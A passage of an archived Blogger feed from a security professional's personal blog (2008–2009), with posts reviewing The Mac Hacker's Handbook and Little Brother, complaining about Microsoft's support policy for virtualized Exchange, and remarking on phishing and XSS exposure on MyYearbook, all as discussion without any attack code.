src="http://3.bp.blogspot.com/_ZPESRkoUdM8/Sgj6ojaOYHI/AAAAAAAAACc/l71VtZhU35o/s400/concept60001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789333227298930" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_ZPESRkoUdM8/Sgj6kJmB-sI/AAAAAAAAACU/A6T07ioy2bE/s1600-h/concept50001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 304px; height: 400px;" src="http://4.bp.blogspot.com/_ZPESRkoUdM8/Sgj6kJmB-sI/AAAAAAAAACU/A6T07ioy2bE/s400/concept50001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789257578019522" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_ZPESRkoUdM8/Sgj6eVCbFHI/AAAAAAAAACM/NdbDRDVnI8Y/s1600-h/concept40001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 309px; height: 400px;" src="http://3.bp.blogspot.com/_ZPESRkoUdM8/Sgj6eVCbFHI/AAAAAAAAACM/NdbDRDVnI8Y/s400/concept40001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789157570679922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_ZPESRkoUdM8/Sgj6VHuBM_I/AAAAAAAAACE/ftXBW6WIMUU/s1600-h/concept30001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 304px;" src="http://4.bp.blogspot.com/_ZPESRkoUdM8/Sgj6VHuBM_I/AAAAAAAAACE/ftXBW6WIMUU/s400/concept30001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788999376614386" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_ZPESRkoUdM8/Sgj505buxoI/AAAAAAAAAB0/O7hHVVK3aFU/s1600-h/concept10001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 291px; height: 400px;" src="http://4.bp.blogspot.com/_ZPESRkoUdM8/Sgj505buxoI/AAAAAAAAAB0/O7hHVVK3aFU/s400/concept10001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788445785998978" border="0" /&gt;&lt;/a&gt;&lt;a href="http://2.bp.blogspot.com/_ZPESRkoUdM8/Sgj6JZx27NI/AAAAAAAAAB8/i_bjcj_OviI/s1600-h/concept20001.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 285px; height: 400px;" src="http://2.bp.blogspot.com/_ZPESRkoUdM8/Sgj6JZx27NI/AAAAAAAAAB8/i_bjcj_OviI/s400/concept20001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788798066126034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4288414193702354258/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4288414193702354258' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4288414193702354258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4288414193702354258'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2009/05/concept-art.html' title='Concept Art'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_ZPESRkoUdM8/Sgj6zLjPetI/AAAAAAAAACs/qC5yQkzg08A/s72-c/concept80001.JPG' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7936927584887217546</id><published>2009-05-11T20:22:00.000-07:00</published><updated>2009-05-11T21:13:48.960-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='OS X sucks'/><category scheme='http://www.blogger.com/atom/ns#' term='books'/><category scheme='http://www.blogger.com/atom/ns#' term='RE'/><category 
scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>The Mac Hacker's Handbook</title><content type='html'>&lt;div style="text-align: left;"&gt;&lt;iframe src="http://rcm.amazon.com/e/cm?t=thievco&amp;amp;o=1&amp;amp;p=8&amp;amp;l=as1&amp;amp;asins=0470395362&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr" style="width: 120px; height: 240px;" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;The Mac Hacker's Handbook is the best reference for Mac-specific attack information that I have found. At 368 pages, it may appear small compared to the typical 750+ page security tome. That's because the authors have done a near-perfect job of sticking to the topic at hand, the Mac. The authors do not succumb to the usual temptation to try and teach assembly language or reverse engineering. Rather, they do an excellent job touching on those topics in an OS X context, and assume the reader has a little background in that area already, or can otherwise keep up. I have done some limited research into the areas of Mac malware and process injection in the past. This book has done a fantastic job of filling in many holes in my knowledge that I hadn't been able to take care of before. Plus, it introduced me to a number of Mac-specific security features I wasn't aware of before. Highly recommended for anyone interested in Mac security.&lt;br /&gt;&lt;br /&gt;Detailed commentary follows.&lt;br /&gt;&lt;br /&gt;The authors Charlie Miller and Dino Dai Zovi have impressed me on several levels.&lt;br /&gt;&lt;br /&gt;A couple of years ago, I did a presentation on Mac malware, where I researched some similar areas on my own. 
The purpose of my talk was to demonstrate that the privilege separation on a typical single-user OS X box made no difference, because an attacker could do everything they need from user mode.&lt;br /&gt;&lt;br /&gt;My skills are somewhere between beginner and intermediate in the areas of programming, reverse engineering, vulnerability research and exploit writing. With a lot of work, I was able to create a very crude keyboard sniffer by attaching a library to launched processes. In one chapter (chapter 11), this book spelled out everything I needed to know and more. It also implements several useful injected components in a much more flexible way than I was able to. I could have really used this information then.&lt;br /&gt;&lt;br /&gt;I ran across many of the same libraries and examples that the authors reference in the book. However, they were mostly code examples with no context, intended to be grokked by hard-core Mac programmers. Here, they are presented in an actually understandable way, building on examples as they go. It makes a huge difference. The level of writing meshed perfectly with my past knowledge and filled in the holes I had. I have an advantage over a rank beginner, but I suspect they have reached as wide an audience as is possible with their writing.&lt;br /&gt;&lt;br /&gt;They do this consistently throughout the book. And what really made this an excellent book for me was the actual writing. You'll have to excuse me if I geek out a little bit on this topic, but I've written a few technical books myself, and I have a great appreciation for how hard it is to do this well.&lt;br /&gt;&lt;br /&gt;There are many traps one can fall into when writing a book like this. A lot of the topics are circular. As in, it's difficult to pick a sane order to follow, and not repeat a lot of information. There's always a temptation to try and show off advanced topics, and not adequately cover the intro material. 
It's easy to get lazy and not put the time into explaining a concept, assuming everyone knows it. Authors sometimes dump a lot of pictures and code on the reader for length.&lt;br /&gt;&lt;br /&gt;These authors fell for none of these. The ordering of topics and advancing difficulty seem ideal. Code is almost uniformly useful and well-documented. They don't beat you over the head with example after example for the same topic. Rather than attempting to include a complete PowerPC and x86 instruction reference, they give you the minimum set of instructions that they used. The pacing was great. I was neither bored reading things I knew, nor unable to keep up with the material (until I struggled slightly to absorb the last chapter or two.)&lt;br /&gt;&lt;br /&gt;Production values are good. The price is great, the length is very appropriate. Editing is good. (Not perfect; I spotted a dozen very minor typos. But then, I can't turn off my internal proofreader anymore; you're unlikely to notice most if any of those.)&lt;br /&gt;&lt;br /&gt;There are other minor things to appreciate if you've been around vulnerabilities and exploits for a while. I feel like they did a great job explaining heap exploitation, compared to other attempts I've read. I very much enjoyed the little bits of history when they discuss who pioneered a particular technique. Most of Dino's code has a date in the comments, so you have some idea what was known at the time.&lt;br /&gt;&lt;br /&gt;I'd go so far as to say that this book really is a general book about how to find and exploit vulnerabilities, using the Mac as your research platform. 
And it turns out that the Mac is a great place to learn.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7936927584887217546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=7936927584887217546' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7936927584887217546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7936927584887217546'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2009/05/mac-hackers-handbook.html' title='The Mac Hacker&apos;s Handbook'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-9145818282934086465</id><published>2009-04-02T00:02:00.000-07:00</published><updated>2009-04-02T01:13:38.731-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='v12n'/><title type='text'>Hey! You! Get off of that cloud!</title><content type='html'>Or Microsoft won't support you.&lt;br /&gt;&lt;br /&gt;We've had an interesting several days dealing with Microsoft at work. 
&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_0"&gt;BigFix&lt;/span&gt; recently signed an Enterprise Agreement with Microsoft, where we committed to X licenses of the workstation OS, and put a number of other things under Select Agreement, including Server OSes, Exchange, &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_1"&gt;SQL&lt;/span&gt; Server, &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_2"&gt;MSDN&lt;/span&gt; subscriptions, and so on. This came with a few free support calls.&lt;br /&gt;&lt;br /&gt;Our OS X and iPhone users (in particular, our CEO) have been anxious to get on Exchange 2007 for the rumored improved Entourage and iPhone support around calendars. So when our CFO wrote the large (for us) check to Microsoft, the IT Team committed to implementing Exchange 2007 in an aggressive time frame. Currently, we're using Exchange and &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_3"&gt;OWA&lt;/span&gt; 2003.&lt;br /&gt;&lt;br /&gt;Doing some research, it looked like the best option was to build new Exchange and &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_4"&gt;OWA&lt;/span&gt; machines and migrate mailboxes. It also looks like the best OS choice is Windows 2003 Server Enterprise 64-bit. We read some documents that indicate Exchange 2007 isn't fully supported on 32-bit Server, and has only just been qualified on Server 2008.&lt;br /&gt;&lt;br /&gt;We put Exchange itself on physical hardware for performance reasons. It's probably not really &lt;span class="blsp-spelling-corrected" id="SPELLING_ERROR_5"&gt;necessary&lt;/span&gt;, but we're being conservative. We used a Dell 2850 with about 1TB of disk and 32GB of RAM that was a &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_6"&gt;VMWare&lt;/span&gt; &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_7"&gt;ESX&lt;/span&gt; server until I replaced it with an even larger Dell R900. It's running Windows Server 2003 Enterprise R2 64-bit. 
The &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_8"&gt;OWA&lt;/span&gt; machine doesn't need any particular performance characteristics though, so we decided to put it on a &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_9"&gt;VM&lt;/span&gt;. It's on the same OS. No problems running 64-bit guests, by the way. We do it all the time.&lt;br /&gt;&lt;br /&gt;Like many companies, we're trying to &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_10"&gt;virtualize&lt;/span&gt; a lot of our infrastructure. We've made a fairly large investment in &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_11"&gt;VMWare's&lt;/span&gt; enterprise products for a company our size, especially in our Engineering organization. I won't get into the benefits here, but for us they are substantial, and our entire disaster recovery plan is tied to &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_12"&gt;VMWare&lt;/span&gt; &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_13"&gt;ESX&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Things were on schedule with the Exchange 2007 configuration. In the interest of time, we had made one support call to Microsoft for install problems on the physical hardware. It burned the equivalent of $299, but for our schedule, it was easily worth it. Exchange was working.&lt;br /&gt;&lt;br /&gt;We ran into a second issue with &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_14"&gt;OWA&lt;/span&gt; 2007. My sysadmin was having trouble getting Outlook Anywhere to work correctly with Outlook 2003 and Entourage. He called again. This time, while the Microsoft support engineer was remote into our &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_15"&gt;OWA&lt;/span&gt; server, he saw &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_16"&gt;VMWare&lt;/span&gt; Tools in the Add/Remove Programs list. 
He asked, and we said yeah, it's a &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_17"&gt;VM&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;He said he could not support us, closed the ticket, and advised us to rebuild on physical hardware and call back. The support engineer also said that if we had had Premier Support, that he could "Look into it." He cited this article: &lt;a href="http://support.microsoft.com/kb/897615"&gt;http://support.microsoft.com/kb/897615&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I'll summarize it: Microsoft only supports &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_18"&gt;virtualized&lt;/span&gt; Windows and MS apps if you use Microsoft &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_19"&gt;virtualization&lt;/span&gt; software.&lt;br /&gt;&lt;br /&gt;That had never &lt;span class="blsp-spelling-corrected" id="SPELLING_ERROR_20"&gt;occurred&lt;/span&gt; to any of us in the IT department. That policy is so ridiculous as to defy belief.&lt;br /&gt;&lt;br /&gt;I complained into the air on Twitter. I got two categories of response: Lie to Microsoft Support, and No, they do support it. It's called the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_21"&gt;SVVP&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Sure, we're willing to lie to support. We just didn't know it was &lt;span class="blsp-spelling-corrected" id="SPELLING_ERROR_22"&gt;necessary&lt;/span&gt;, and we got caught this time.&lt;br /&gt;&lt;br /&gt;By the way, I'm going to jump ahead in the story for a moment and say that yes, we did rebuild &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_23"&gt;OWA&lt;/span&gt; on physical hardware and call back. And it turns out that the problem was on the Exchange server, NOT the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_24"&gt;OWA&lt;/span&gt; server. 
So no, it's not possible that &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_25"&gt;VMWare&lt;/span&gt; was a factor, and yes, we did waste days and slipped our schedule for no good reason. I say this mostly to save you the trouble of trying to fix my technical problem, it's already done.&lt;br /&gt;&lt;br /&gt;And of course, that's not the real issue.&lt;br /&gt;&lt;br /&gt;During these several days while my sysadmin gave up and build a physical box to appease Microsoft Support, the rest of us were complaining bitterly to our Microsoft sales rep. We still could not believe that they really intended to have that as a policy. He insists that they did. He knows, because he has had "lots of customers complain about it."&lt;br /&gt;&lt;br /&gt;What about the &lt;a href="http://www.windowsservercatalog.com/svvp.aspx"&gt;&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_26"&gt;SVVP&lt;/span&gt;&lt;/a&gt;, I asked my sales rep? Both a Microsoft employee and a &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_27"&gt;VMWare&lt;/span&gt; employee pointed out to me on Twitter that &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_28"&gt;ESX&lt;/span&gt; IS supported. Nope, my sales rep says that's only for the Windows OS itself.&lt;br /&gt;&lt;br /&gt;But wait, the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_29"&gt;VMWare&lt;/span&gt; guy pointed out to me that &lt;a href="http://technet.microsoft.com/en-us/library/cc794548.aspx"&gt;Exchange on &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_30"&gt;VM&lt;/span&gt;&lt;/a&gt; is specifically covered under the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_31"&gt;SVVP&lt;/span&gt;. Surely this means I'm good, right? This is just a case of Microsoft Support not being up on the latest Microsoft policies?&lt;br /&gt;&lt;br /&gt;Nope. 
That article only covers Exchange 2007 SP1 (good) on &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_32"&gt;SVVP&lt;/span&gt; &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_33"&gt;virtualization&lt;/span&gt; software (good) on Windows Server 2008 (bad, I'm using Server 2003.)&lt;br /&gt;&lt;br /&gt;So yes, they STILL turned me down for support on &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_34"&gt;ESX&lt;/span&gt;. But they would support all of it if I was using Hyper-V.&lt;br /&gt;&lt;br /&gt;This is far worse than my little problem not being handled. This would seem to indicate that Microsoft intends to qualify every single app they produce as being covered on &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_35"&gt;VMWare&lt;/span&gt; or not. And only the versions that they feel like. And only if it's on a Windows version they want to cover.&lt;br /&gt;&lt;br /&gt;So the latest set of articles on how to tune &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_36"&gt;SQL&lt;/span&gt; Server 2005 on &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_37"&gt;ESX&lt;/span&gt;? Forget it. It's not supported.&lt;br /&gt;&lt;br /&gt;It's really hard to not immediately leap to accusing Microsoft of more &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_38"&gt;anticompetitive&lt;/span&gt; behavior and vendor lock-in for their own &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_39"&gt;virtualization&lt;/span&gt; technology.&lt;br /&gt;&lt;br /&gt;Does Microsoft qualify every individual app on the hardware in the supported hardware list? Of course not. If the OS works, the apps should work. That is the basic job of the OS, yes? To abstract the hardware for the apps? 
So if Microsoft has qualified Windows 2003 on &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_40"&gt;ESX&lt;/span&gt;, why should they decline to support &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_41"&gt;OWA&lt;/span&gt; on it?&lt;br /&gt;&lt;br /&gt;Is there an Exchange 2007 SP1 supported hardware list somewhere I'm not aware of?&lt;br /&gt;&lt;br /&gt;At my most generous, I can assume that Microsoft Support is just not aware of Microsoft's own policies on this topic. And Microsoft Sales isn't either. My rep still says he can't help me. I can even see wanting to qualify Microsoft OSes on &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_42"&gt;ESX&lt;/span&gt; "hardware", just like they would on Dell or HP. (Though when is the last time Microsoft Support even ASKED you what hardware you're running on?)&lt;br /&gt;&lt;br /&gt;But to try and take a policy that every app needs to be qualified individually, down to the service pack level? Unless you're on Microsoft's &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_43"&gt;virtualization&lt;/span&gt; technology?&lt;br /&gt;&lt;br /&gt;That's just quite possibly criminal.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-9145818282934086465?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/9145818282934086465/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=9145818282934086465' title='17 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/9145818282934086465'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/9145818282934086465'/><link rel='alternate' type='text/html' 
href='http://ryanlrussell.blogspot.com/2009/04/hey-you-get-off-of-that-cloud.html' title='Hey! You! Get off of that cloud!'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>17</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5111438917068441785</id><published>2008-08-04T11:48:00.000-07:00</published><updated>2008-08-04T11:49:30.422-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Twitter</title><content type='html'>Twitter:&lt;br /&gt;&lt;a href="http://twitter.com/ryanlrussell"&gt;http://twitter.com/ryanlrussell&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Tweet, or something.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5111438917068441785/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5111438917068441785' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5111438917068441785'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5111438917068441785'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/08/twitter.html' title='Twitter'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' 
width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4604125511726947987</id><published>2008-07-21T12:08:00.000-07:00</published><updated>2008-07-21T12:21:14.043-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>MyYearbook</title><content type='html'>I've been wasting a bunch of time on MyYearbook.com, a MTWWTOSNS (massively time-wasting web-two-oh social-networking site.) If you'd like to descend into madness with me, click here to join, for my personal gain:&lt;br /&gt;&lt;a href="http://www.myyearbook.com/join.php?ref=1211864511"&gt;Be Ryan's Friend&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Several interesting aspects to this one, for security people. First, there are many sociological aspects. For example, what happens if you tell people they &lt;span style="font-style: italic; font-weight: bold;"&gt;can't&lt;/span&gt; post naked pics? Second, there is a play money currency, which drives everyone's behavior. Finally, they are getting phished left and right from &lt;span style="font-style: italic; font-weight: bold;"&gt;within&lt;/span&gt; the site.&lt;br /&gt;&lt;br /&gt;And the staff there appears to be so woefully unprepared to deal with it. When I saw the phishing, I thought I might mail their abuse contact info (only email address I found published), and see if they needed info, if I could put them in touch with a takedown group, etc. I got bounces from gmail. Um, your abuse email at your own domain depends on gmail?&lt;br /&gt;&lt;br /&gt;The site is absolutely begging for someone to start using XSS. The game model they have basically demands it. For example, your popularity depends on profile views. And I can post a pretty wide range of HTML to someone in about 20 different ways. 
I haven't tried to see if I can find any XSS. Mostly because I don't trust myself not to abuse it.&lt;br /&gt;&lt;br /&gt;But here's my favorite thing about MyYearbook, which I just realized while sitting in JFK coming back from HOPE. This site is teaching millions of people how to do simple HTML. And nearly half of these people are below average intelligence.&lt;br /&gt;&lt;br /&gt;Edutainment, indeed.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4604125511726947987/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4604125511726947987' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4604125511726947987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4604125511726947987'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/07/myyearbook.html' title='MyYearbook'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5840870991083750472</id><published>2008-07-18T23:10:00.000-07:00</published><updated>2008-07-18T23:22:20.342-07:00</updated><title type='text'>Politics, $8.34 worth</title><content type='html'>This post is about politics, which I normally would avoid. 
But humor me this one time.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://seantevis.com/kansas/3000/running-for-office-xkcd-style/"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3249/2676618297_4fe5d1d9ca_o.png" alt="" border="0" /&gt;&lt;/a&gt;Click on the pic to have your geek heartstrings pulled. Short version: If he's willing and able to put this up, that's all I need to know. Don't care if he's pandering.&lt;br /&gt;&lt;br /&gt;Yeah, I gave him $8.34.&lt;br /&gt;&lt;br /&gt;Long version: Doesn't matter if he's in Kansas, I want people like this to succeed. Doesn't matter if I agree with all of his policies, you never get a candidate that matches exactly, and you can't count on them to implement them once in office. Plus, he appears to be able to change his mind based on &lt;a href="http://seantevis.com/kansas/issue/illegal-immigration/"&gt;feedback&lt;/a&gt;, holy crap.&lt;br /&gt;&lt;br /&gt;If you want more candidates like this, consider giving him the token donations (US only), and blog him up.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5840870991083750472?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5840870991083750472/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5840870991083750472' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5840870991083750472'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5840870991083750472'/><link rel='alternate' type='text/html' 
href='http://ryanlrussell.blogspot.com/2008/07/politics-834-worth.html' title='Politics, $8.34 worth'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-2755992038378823703</id><published>2008-07-15T21:17:00.000-07:00</published><updated>2008-07-15T21:18:52.031-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>HOPE</title><content type='html'>I'll be in NYC for HOPE, starting tomorrow. Any of you going to be there?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-2755992038378823703?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2755992038378823703/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=2755992038378823703' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2755992038378823703'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2755992038378823703'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/07/hope.html' title='HOPE'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1789673318552241975</id><published>2008-06-08T14:26:00.000-07:00</published><updated>2008-06-08T15:59:48.511-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><category scheme='http://www.blogger.com/atom/ns#' term='review'/><title type='text'>Little Brother</title><content type='html'>I just finished reading &lt;a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;amp;location=http%3A%2F%2Fwww.amazon.com%2FLittle-Brother-Cory-Doctorow%2Fdp%2F0765319853&amp;amp;tag=thievco&amp;amp;linkCode=ur2&amp;amp;camp=1789&amp;amp;creative=9325"&gt;Little Brother&lt;/a&gt;&lt;img src="http://www.assoc-amazon.com/e/ir?t=thievco&amp;amp;l=ur2&amp;amp;o=1" alt="" style="border: medium none  ! important; margin: 0px ! important;" border="0" height="1" width="1" /&gt; by Cory Doctorow while on a plane to Seattle for a &lt;a href="http://windowssecrets.com/"&gt;Windows Secrets&lt;/a&gt; meetup.&lt;br /&gt;&lt;br /&gt;There are a few audiences one might rate this book against. Probably the only fair one is the one Cory wrote for, young adult readers who need an introduction to electronic civil rights (and civil rights in general, 